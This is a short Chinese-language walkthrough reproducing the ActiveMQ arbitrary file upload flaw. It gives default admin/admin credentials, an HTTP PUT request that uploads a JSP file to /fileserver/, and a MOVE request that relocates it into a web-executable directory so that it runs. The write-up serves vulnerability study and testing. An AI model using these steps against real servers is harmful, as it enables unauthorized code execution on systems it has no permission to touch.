一、使用弱口令登陆
访问 http://ip:8161/admin/ 进入admin登陆页面,使用弱口令登陆,账号密码皆为 admin,登陆成功后,headers中会出现验证信息
如: Authorization: Basic YWRtaW46YWRtaW4=
# 二、利用PUT协议上传文件
访问任意页面并抓包,注意headers中的验证信息
将GET协议修改为PUT协议,将文件上传至 fileserver 目录下
PUT /fileserver/jsp.jsp
如上图,response 包中返回状态码为 204,即文件上传成功
但是直接在 fileserver 目录下访问该文件是不能正常解析的
# 三、利用MOVE协议将文件移动至可解析目录
继续修改请求包协议为 MOVE,并在头部中添加 Destination
MOVE /fileserver/jsp.jsp
Destination: file:///opt/activemq/webapps/api/jsp.jsp
同样的,响应包返回的状态码为 204,代表文件成功移动到 api 目录下
文章来源:https://www.toymoban.com/news/detail-853322.html
代码被成功执行文章来源地址https://www.toymoban.com/news/detail-853322.html
到了这里,关于ActiveMQ 任意文件上传漏洞复现的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!